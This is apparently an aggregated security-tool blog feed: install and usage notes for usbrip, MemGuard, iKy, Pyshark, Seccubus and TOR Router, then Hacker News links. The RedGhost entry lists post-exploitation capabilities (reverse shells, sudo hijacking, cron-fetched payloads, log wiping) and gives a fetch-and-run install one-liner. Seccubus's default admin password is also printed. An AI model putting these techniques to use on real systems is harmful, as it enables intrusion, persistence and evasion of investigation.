There are two ways to install usbrip into the system: pip or setup.py.

pip or setup.py

First of all, usbrip is pip installable. This means that after git cloning the repo you can simply fire up the pip installation process and after that run usbrip from anywhere in your terminal like so:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install .

(venv) ~/usbrip$ usbrip -h

Or if you want to resolve Python dependencies locally (without bothering PyPI), use setup.py:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ python setup.py install

(venv) ~/usbrip$ usbrip -h

alien Note: you'd likely want to run the installation process while the Python virtual environment is active (like it is shown above).

install.sh

Secondly, usbrip can also be installed into the system with the ./installers/install.sh script.

When using the ./installers/install.sh some extra features become available:
  • the virtual environment is created automatically;
  • the storage module becomes available: you can set a crontab job to backup USB events on a schedule (the example of crontab jobs can be found in usbrip/cron/usbrip.cron).

Warning: if you are using the crontab scheduling, you want to configure the cron job with sudo crontab -e in order to force the storage update submodule run as root as well as protect the passwords of the USB event storages. The storage passwords are kept in /var/opt/usbrip/usbrip.ini.

The ./installers/uninstall.sh script removes all the installation artifacts from your system.

To install usbrip use:

~/usbrip$ chmod +x ./installers/install.sh
~/usbrip$ sudo -H ./installers/install.sh [-l/--local] [-s/--storages]
~/usbrip$ cd

~$ usbrip -h

  • When -l switch is enabled, Python dependencies are resolved from local .tar packages (./3rdPartyTools/) instead of PyPI.
  • When -s switch is enabled, not only the usbrip project is installed, but also the list of trusted USB devices, history and violations storages are created.

Note: when using -s option during installation, make sure that system logs do contain at least one external USB device entry. It is a necessary condition for usbrip to successfully create the list of trusted devices (and as a result, successfully create the violations storage).

After the installation completes, feel free to remove the usbrip folder.

Paths

When installed, the usbrip uses the following paths:
  • /opt/usbrip/ — project's main directory;
  • /var/opt/usbrip/usbrip.ini — usbrip configuration file: keeps passwords for 7zip storages;
  • /var/opt/usbrip/storage/ — USB event storages: history.7z and violations.7z (created during the installation process);
  • /var/opt/usbrip/log/ — usbrip logs (recommended to log usbrip activity when using crontab, see usbrip/cron/usbrip.cron);
  • /var/opt/usbrip/trusted/ — list of trusted USB devices (created during the installation process);
  • /usr/local/bin/usbrip — symlink to the /opt/usbrip/venv/bin/usbrip script.

cron

Cron jobs can be set as follows:

~/usbrip$ sudo crontab -l > tmpcron && echo "" >> tmpcron
~/usbrip$ cat usbrip/cron/usbrip.cron | tee -a tmpcron
~/usbrip$ sudo crontab tmpcron
~/usbrip$ rm tmpcron

uninstall.sh

To uninstall usbrip use:

~/usbrip$ chmod +x ./installers/uninstall.sh
~/usbrip$ sudo ./installers/uninstall.sh [-a/--all]

When -a switch is enabled, not only the usbrip project directory is deleted, but also all the storages and usbrip logs are deleted too.

And don't forget to remove the cron job.

Usage

Synopsis

# ---------- BANNER ----------

$ usbrip banner
Get usbrip banner.

# ---------- EVENTS ----------

$ usbrip events history [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB event history.

$ usbrip events open <DUMP.JSON> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Open USB event dump.

$ usbrip events gen_auth <OUT_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Generate a list of trusted (authorized) USB devices.

$ usbrip events violations <IN_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB violation events based on the list of trusted devices.

# ---------- STORAGE ----------

$ usbrip storage list <STORAGE_TYPE> [-q] [--debug]
List contents of the selected storage (7zip archive). STORAGE_TYPE is "history" or "violations".

$ usbrip storage open <STORAGE_TYPE> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-q] [--debug]
Open selected storage (7zip archive). Behaves similary to the EVENTS OPEN submodule.

$ usbrip storage update <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Update storage — add USB events to the existing storage (7zip archive). COMPRESSION_LEVEL is a number in [0..9].

$ usbrip storage create <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Create storage — create 7zip archive and add USB events to it according to the selected options.

$ usbrip storage passwd <STORAGE_TYPE> [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Change password of the existing storage.

# ---------- IDs ----------

$ usbrip ids search [--vid <VID>] [--pid <PID>] [--offline] [-q] [--debug]
Get extra details about a specific USB device by its <VID> and/or <PID> from the USB ID database.

$ usbrip ids download [-q] [--debug]
Update (download) the USB ID database.

Help

To get a list of module names use:

$ usbrip -h

To get a list of submodule names for a specific module use:

$ usbrip <module> -h

To get a list of all switches for a specific submodule use:

$ usbrip <module> <submodule> -h


Examples

Show the event history of all USB devices, supressing banner output, info messages and user interaction (-q, --quiet), represented as a list (-l, --list) with latest 100 entries (-n NUMBER, --number NUMBER):

$ usbrip events history -ql -n 100

Show the event history of the external USB devices (-e, --external, which were actually disconnected) represented as a table (-t, --table) containing "Connected", "VID", "PID", "Disconnected" and "Serial Number" columns (-c COLUMN [COLUMN], --column COLUMN [COLUMN]) filtered by date (-d DATE [DATE ...], --date DATE [DATE ...]) with logs taken from the outer files (-f FILE [FILE ...], --file FILE [FILE ...]):

$ usbrip events history -et -c conn vid pid disconn serial -d "Dec  9" "Dec 10" -f /var/log/syslog.1 /var/log/syslog.2.gz

Build the event history of all USB devices and redirect the output to a file for further analysis. When the output stream is NOT terminal stdout (| or > for example) there would be no ANSI escape characters (color) in the output so feel free to use it that way. Also notice that usbrip uses some UNICODE symbols so it would be nice to convert the resulting file to UTF-8 encoding (with encov for example) as well as change newline characters to Windows style for portability (with awk for example):

usbrip history events -t | awk '{ sub("$", "\r"); print }' > usbrip.out && enconv -x UTF8 usbrip.out

Remark: you can always get rid of the escape characters by yourself even if you have already got the output to stdout. To do that just copy the output data to usbrip.out and add one more awk instruction:

awk '{ sub("$", "\r"); gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' usbrip.out && enconv -x UTF8 usbrip.out

Generate a list of trusted USB devices as a JSON-file (trusted/auth.json) with "VID" and "PID" attributes containing the first three devices connected on September 26:

$ usbrip events gen_auth trusted/auth.json -a vid pid -n 3 -d "Sep 26"

Search the event history of the external USB devices for violations based on the list of trusted USB devices (trusted/auth.json) by "PID" attribute, restrict resulting events to those which have "Bob" as a user, "EvilUSBManufacturer" as a manufacturer, "1234567890" as a serial number and represent the output as a table with "Connected", "VID" and "PID" columns:

$ usbrip events violations trusted/auth.json -a pid -et --user Bob --manufact EvilUSBManufacturer --serial 1234567890 -c conn vid pid

Search for details about a specific USB device by its VID (--vid VID) and PID (--pid PID):

$ usbrip ids search --vid 0781 --pid 5580

Download the latest version of usb_ids/usb.ids database (the source is here):

$ usbrip ids download

Download USBrip

Article link

Date of publish: Mon, 29 Jul 2019 07:18:00 +0000

MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory



MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory


This package attempts to reduce the likelihood of sensitive data being exposed. It supports all major operating systems and is written in pure Go.

Features


  • Sensitive data is encrypted and authenticated in memory using xSalsa20 and Poly1305 respectively. The scheme also defends against cold-boot attacks.
  • Memory allocation bypasses the language runtime by using system calls to query the kernel for resources directly. This avoids interference from the garbage-collector.
  • Buffers that store plaintext data are fortified with guard pages and canary values to detect spurious accesses and overflows.
  • Effort is taken to prevent sensitive data from touching the disk. This includes locking memory to prevent swapping and handling core dumps.
  • Kernel-level immutability is implemented so that attempted modification of protected regions results in an access violation.
  • Multiple endpoints provide session purging and safe termination capabilities as well as signal handling to prevent remnant data being left behind.
  • Side-channel attacks are mitigated against by making sure that the copying and comparison of data is done in constant-time.
  • Accidental memory leaks are mitigated against by harnessing the garbage-collector to automatically destroy containers that have become unreachable.

Some features were inspired by libsodium, so credits to them.

Full documentation and a complete overview of the API can be found here. Interesting and useful code samples can be found within the examples subpackage.

Installation

$ go get github.com/awnumar/memguard

We strongly encourage you to pin a specific version for a clean and reliable build. This can be accomplished using modules.

Contributing


  • Using the package and identifying points of friction.
  • Reading the source code and looking for improvements.
  • Adding interesting and useful program samples to ./examples.
  • Developing Proof-of-Concept attacks and mitigations.
  • Improving compatibility with more kernels and architectures.
  • Implementing kernel-specific and cpu-specific protections.
  • Writing useful security and crypto libraries that utilise memguard.
  • Submitting performance improvements or benchmarking code.

Issues are for reporting bugs and for discussion on proposals. Pull requests should be made against master.

Future goals


  • Ability to stream data to and from encrypted enclave objects.
  • Catch segmentation faults to wipe memory before crashing.
  • Evaluate and improve the strategies in place, particularly for Coffer objects.
  • Formalise a threat model and evaluate our performance in regards to it.
  • Use lessons learned to apply patches upstream to the Go language and runtime.

Article link

Date of publish: Sun, 28 Jul 2019 13:14:00 +0000

iKy OSINT Project - To Collect Information From E-Mail With GUI


iky OSINT Project. Collect information from a mail. Gather, Profile, Timeline.


Project iKy is to collects information from an email and shows results in a nice visual interface.

Installation


Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis

wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

And turn on the server in a terminal

redis-server

Python stuff and Celery

You must install the libraries inside requirements.txt
pip install -r requirements.txt

And turn on Celery in another terminal, within the directory backend
./celery.sh

Finally, again, in another terminal turn on backend app from directory backend

python app.py

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the directory frontend install the dependencies

npm install

Turn on Frontend Server

Finally, to run frontend server, execute:

npm start

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded

Video Demo

Article link

Date of publish: Mon, 22 Jul 2019 08:22:00 +0000

RedGhost - Linux Post Exploitation Framework

RedGhost -  Linux Post Exploitation Framework

RedGhost- Linux post exploitation framework 


It has designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace. 


  • Payloads
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl

  • SudoInject
Function to inject sudo command with wrapper function to run a reverse root shell everytime "sudo" is run for privilege escalataion

  • lsInject
Function to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistence

  • Crontab
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence

  • GetRoot
Function to try various methods to escalate privileges

  • Clearlogs
Function to clear logs and make investigation with forensics difficult

  • MassInfoGrab
Function to grab mass reconaissance/information on system

  • CheckVM
Function to check if the system is a virtual machine

  • MemoryExec
Function to execute remote bash script in memory

  • BanIp
Function to BanIp using iptables

Installation

Install RedGhost in one line code:

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh

One line code to Install prerequisites and RedGhost :

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-g

Download Redghost

Article link

Date of publish: Fri, 19 Jul 2019 08:30:00 +0000

Pyshark- To Allowing Python Packet Parsing Using Wireshark Dissectors


Python wrapper for tshark, allowing python packet parsing using Wireshark dissectors.


Pyshark features a few "Capture" objects (Live, Remote, File, InMem). Each of those files read from their respective source and then can be used as an iterator to get their packets. Each capture object can also receive various filters so that only some of the incoming packets will be saved.

Installation

All Platforms

Simply run the following to install the latest from pypi

pip install pyshark

Or install from the git repository:

git clone https://github.com/KimiNewt/pyshark.git
cd pyshark/src
python setup.py install

Mac OS X

You may have to install libxml which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:

xcode-select --install
pip install libxml

You will probably have to accept a EULA for XCode so be ready to click an "Accept" dialog in the GUI.

Usage

Reading from a capture file:

>>> import pyshark
>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')
>>> cap
<FileCapture /tmp/mycapture.cap (589 packets)>
>>> print cap[0]
Packet (Length: 698)
Layer ETH:
        Destination: BLANKED
        Source: BLANKED
        Type: IP (0x0800)
Layer IP:
        Version: 4
        Header Length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
        Total Length: 684
        Identification: 0x254f (9551)
        Flags: 0x00
        Fragment offset: 0
        Time to live: 1
        Protocol: UDP (17)
        Header checksum: 0xe148 [correct]
        Source: BLANKED
        Destination: BLANKED
  ...

Other options

  • param keep_packets: Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.
  • param input_file: Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.
  • param display_filter: A display (wireshark) filter to apply on the cap before reading it.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK.
  • param tshark_path: Path of the tshark binary.

Reading from a live interface:

>>> capture = pyshark.LiveCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print 'Just arrived:', packet

Other options
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live interface using a ring buffer

>>> capture = pyshark.LiveRingCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print 'Just arrived:', packet

Other options
  • param ring_file_size: Size of the ring file in kB, default is 1024
  • param num_ring_files: Number of ring files to keep, default is 1
  • param ring_file_name: Name of the ring file, default is /tmp/pyshark.pcap
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live remote interface:

>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')
>>> capture.sniff(timeout=50)
>>> capture

Other options
  • param remote_host: The remote host to capture on (IP or hostname). Should be running rpcapd.
  • param remote_interface: The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).
  • param remote_port: The remote port the rpcapd service is listening on
  • param bpf_filter: A BPF (tcpdump) filter to apply on the cap before reading.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary

Accessing packet data:

Data can be accessed in multiple ways. Packets are divided into layers, first you have to reach the appropriate layer and then you can select your field.

All of the following work:

>>> packet['ip'].dst
192.168.0.1
>>> packet.ip.src
192.168.0.100
>>> packet[2].src
192.168.0.100

To test whether a layer is in a packet, you can use its name:

>>> 'IP' in packet
True

To see all possible field names, use the packet.layer.field_names attribute (i.e. packet.ip.field_names) or the autocomplete function on your interpreter.

You can also get the original binary data of a field, or a pretty description of it:

>>> p.ip.addr.showname
Source or Destination Address: 10.0.0.10 (10.0.0.10)
# And some new attributes as well:
>>> p.ip.addr.int_value
167772170
>>> p.ip.addr.binary_value
'\n\x00\x00\n'

Decrypting packet captures

Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).

>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')
>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')

A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.

>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')

Python2 deprecation - 

This package no longer supports Python2. If you wish to still use it in Python2, you can:

Use version 0.3.8

  • Install pyshark-legacy via pypi
  • Clone the pyshark-legacy [repo (https://github.com/KimiNewt/pyshark-legacy)], where bugfixes will be applied.


Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed and if any one is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.

There are quite a few python packet parsing modules, this one is different because it doesn't actually parse any packets, it simply uses tshark's (wireshark command-line utility) ability to export XMLs to use its parsing.

This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on windows/linux.

Download Pyshark

Article link

Date of publish: Tue, 16 Jul 2019 14:19:00 +0000

Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time - eBook


"Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time"


Learn how to hack systems like black hat hackers and secure them like security experts.

This eBook will help you:

  • Understand ethical hacking and the different fields and types of hackers
  • Set up a penetration testing lab to practice safe and legal hacking
  • Explore Linux basics, commands, and how to interact with the terminal
  • Access password-protected networks and spy on connected clients
  • Use server and client-side attacks to hack and control remote computers
  • Control a hacked system remotely and use it to hack other systems
  • Discover, exploit, and prevent a number of web application vulnerabilities such as XSS and SQL injections
  • Understand how computer systems work and their vulnerabilities, exploit weaknesses and hack into machines to test their security, and learn how to secure systems from hackers now!

Free offer expires 07/23/19.

Offered Free by: Packt

 DOWNLOAD NOW!
DOWNLOAD NOW

Article link

Date of publish: Wed, 10 Jul 2019 19:28:00 +0000

Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.

Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues.

On repeated scan delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.

Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.

Seccubus V2 works with the following scanners:
  • Nessus
  • OpenVAS
  • Skipfish
  • Medusa (local and remote)
  • Nikto (local and remote)
  • NMap (local and remote)
  • OWASP-ZAP (local and remote)
  • SSLyze
  • Medusa
  • Qualys SSL labs
  • testssl.sh (local and remote)

Docker

Available images.

         Image name                                   Purpose                         
  • seccubus                     Run a full Seccubus stack in a single container
  • seccubus-front            Serving just the front end HTML, javascript and css
  • seccubus-web             Serving front and code and API simultaniously
  • seccubus-api               Serving just the API.
  • seccubus-perl              Running command line scripts, e.g. to scan
  • seccubus-cron             Running cron deamon to execute scans


Information about the docker containers is here

Default password, changing it.

After installation the default username and password for seccubus is:

admin / GiveMeVulns!

It is highly recommended you change this after installation.

/bin/seccubus_passwd -u admin

Download Seccubus

Article link

Date of publish: Fri, 21 Jun 2019 14:05:00 +0000

TOR Router- To Use As Transparent Proxy And Send Traffic Under TOR


TOR Router- A tool that allow you to make TOR your default gateway and send all internet connections under TOR (as transparent proxy) for increase privacy/anonymity without extra unnecessary code.

Tor Router allow you to use TOR as a transparent proxy and send all your traffic under TOR INCLUDING DNS REQUESTS, the only that you need is: a system using systemd (if you want to use the service) and tor.

TOR router doesn't touch system files as the rest of tools for routing your taffic does and the reason is: there isn't needed to move files for routing traffic, also moving files is a bad idea since that a fail in the script/tool can break your system connection without you knowing what has happened.

Script to install on distros using SystemD only

If you are using BlackArch Linux (https://blackarch.org) you can install the script from the repos using the following command:

# pacman -S tor-router

To install from source:

Note that you need BASH, not sh

~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd ./tor-router && sudo bash install.sh

Usage

In distros using systemd, you should consideer using the install.sh script, anyways the process to install/configure tor-router is described here.

It script require root privileges

1. Open a terminal and clone the script using the following command:
~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd tor-router/files

2. Put the following lines at the end of /etc/tor/torrc
# Seting up TOR transparent proxy for tor-router
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353

3. Restart the tor service
4. Execute the tor-router script as root
# sudo ./tor-router

5. Now all your traffic is under TOR, you can check that in the following pages: https://check.torproject.org and for DNS tests: https://dnsleaktest.com

6. In order to automate the process of the script, you should add it to the SYSTEM autostart scripts according that the init that you are using, for systemd we have a .service file in the files folder.

Uninstalling/Stoping

Delete the tor-router configuration lines in /etc/tor/torrc, disable the tor-router.service using systemctl (if you used the install.sh script), remove /usr/bin/tor-router, /etc/systemd/system/tor-router.service and restart your computer.

Proof of concept

After of run the script, follow the next steps to ensure that all is working as expected:

IP hidden and TOR network configured: 
Visit https://check.torproject.org, you should see a message like it:


Checking DNS Leaks: 

Visit https://dnsleaktest.com and make a extended test to see what are your DNS. You shloud get some like it:


Distros using the script

BlackArch Linux: https://github.com/BlackArch/blackarch/blob/master/packages/tor-router

Download TOR Router

Article link

Date of publish: Wed, 12 Jun 2019 11:00:00 +0000

Hacker News: Front Page

How urea forms spontaneously

Article URL: https://ethz.ch/en/news-and-events/eth-news/news/2025/06/how-urea-forms-spontaneously.html

Comments URL: https://news.ycombinator.com/item?id=44423812

Points: 3

# Comments: 0

Article link

Date of publish: Mon, 30 Jun 2025 14:30:42 +0000

Congress might block state AI laws for a decade
Show HN: TokenDagger – A tokenizer faster than OpenAI's Tiktoken

TokenDagger is a drop-in replacement for OpenAI’s Tiktoken (the tokenizer behind Llama 3, Mistral, GPT-3.*, etc.). It’s written in C++ 17 with thin Python bindings, keeps the exact same BPE vocab/special-token rules, and focuses on raw speed.

I’m teaching myself LLM internals by re-implementing the stack from first principles. Profiling TikToken’s Python/Rust implementation showed a lot of time was spent doing regex matching. Most of my perf gains come from a) using a faster jit-compiled regex engine; and b) simplifying the algorithm to forego regex matching special tokens at all.

Benchmarking code is included. Notable results show: - 4x faster code sample tokenization on a single thread. - 2-3x higher throughput when tested on a 1GB natural language text file.


Comments URL: https://news.ycombinator.com/item?id=44422480

Points: 72

# Comments: 15

Article link

Date of publish: Mon, 30 Jun 2025 12:33:58 +0000

Entry-level jobs down by a third since launch of ChatGPT

Article URL: https://www.personneltoday.com/hr/fall-in-entry-level-jobs-linked-to-rise-of-ai-tools/

Comments URL: https://news.ycombinator.com/item?id=44422040

Points: 53

# Comments: 83

Article link

Date of publish: Mon, 30 Jun 2025 11:38:54 +0000

Printegrated Circuits: Merging 3D Printing and Electronics

Article URL: https://spectrum.ieee.org/3d-printing-smart-objects

Comments URL: https://news.ycombinator.com/item?id=44421978

Points: 3

# Comments: 0

Article link

Date of publish: Mon, 30 Jun 2025 11:30:23 +0000

Show HN: New Ensō – first public beta

Ensō is a writing tool that helps you enter a state of flow by separating writing from editing and thus making it harder for you to edit yourself - https://enso.sonnet.io/

After 6 years and 2 million words of daily writing I feel like I've learned enough to make Ensō simpler and more accessible.

Related thread: https://news.ycombinator.com/item?id=38025073


Comments URL: https://news.ycombinator.com/item?id=44421776

Points: 74

# Comments: 34

Article link

Date of publish: Mon, 30 Jun 2025 11:02:55 +0000

The provenance memory model for C

Article URL: https://gustedt.wordpress.com/2025/06/30/the-provenance-memory-model-for-c/

Comments URL: https://news.ycombinator.com/item?id=44421185

Points: 100

# Comments: 27

Article link

Date of publish: Mon, 30 Jun 2025 09:25:14 +0000

Want to meet people, try charging them for it?

Article URL: https://notes.eatonphil.com/2025-06-28-want-to-meet-people-charge-them.html

Comments URL: https://news.ycombinator.com/item?id=44419986

Points: 136

# Comments: 69

Article link

Date of publish: Mon, 30 Jun 2025 06:13:10 +0000

Gridfinity: The modular, open-source grid storage system

Article URL: https://gridfinity.xyz/

Comments URL: https://news.ycombinator.com/item?id=44419091

Points: 266

# Comments: 113

Article link

Date of publish: Mon, 30 Jun 2025 03:37:21 +0000

NativeJIT: A C++ expression –> x64 JIT (2018)

Article URL: https://github.com/BitFunnel/NativeJIT

Comments URL: https://news.ycombinator.com/item?id=44418840

Points: 62

# Comments: 29

Article link

Date of publish: Mon, 30 Jun 2025 02:59:52 +0000

Use keyword-only arguments in Python dataclasses

Article URL: https://chipx86.blog/2025/06/29/tip-use-keyword-only-arguments-in-python-dataclasses/

Comments URL: https://news.ycombinator.com/item?id=44418036

Points: 80

# Comments: 38

Article link

Date of publish: Mon, 30 Jun 2025 00:45:36 +0000

Cell Towers Can Double as Cheap Radar Systems for Ports and Harbors (2014)

Article URL: https://spectrum.ieee.org/cell-tower-signals-can-improve-port-security

Comments URL: https://news.ycombinator.com/item?id=44416761

Points: 113

# Comments: 53

Article link

Date of publish: Sun, 29 Jun 2025 21:48:12 +0000

Anticheat Update Tracking

Article URL: https://not-matthias.github.io/posts/anticheat-update-tracking/

Comments URL: https://news.ycombinator.com/item?id=44416421

Points: 89

# Comments: 32

Article link

Date of publish: Sun, 29 Jun 2025 21:06:57 +0000

Ask HN: What Are You Working On? (June 2025)

What are you working on? Any new ideas which you're thinking about?


Comments URL: https://news.ycombinator.com/item?id=44416093

Points: 263

# Comments: 808

Article link

Date of publish: Sun, 29 Jun 2025 20:21:28 +0000

The $25k car is going extinct?

Article URL: https://media.hubspot.com/why-the-25000-car-is-going-extinct

Comments URL: https://news.ycombinator.com/item?id=44414115

Points: 266

# Comments: 744

Article link

Date of publish: Sun, 29 Jun 2025 15:59:56 +0000

Event – Fast, In-Process Event Dispatcher

Article URL: https://github.com/kelindar/event

Comments URL: https://news.ycombinator.com/item?id=44413809

Points: 157

# Comments: 34

Article link

Date of publish: Sun, 29 Jun 2025 15:19:19 +0000

The Medley Interlisp Project: Reviving a Historical Software System [pdf]

Article URL: https://interlisp.org/documentation/young-ccece2025.pdf

Comments URL: https://news.ycombinator.com/item?id=44413574

Points: 107

# Comments: 17

Article link

Date of publish: Sun, 29 Jun 2025 14:45:10 +0000

I made my VM think it has a CPU fan

Article URL: https://wbenny.github.io/2025/06/29/i-made-my-vm-think-it-has-a-cpu-fan.html

Comments URL: https://news.ycombinator.com/item?id=44413185

Points: 586

# Comments: 149

Article link

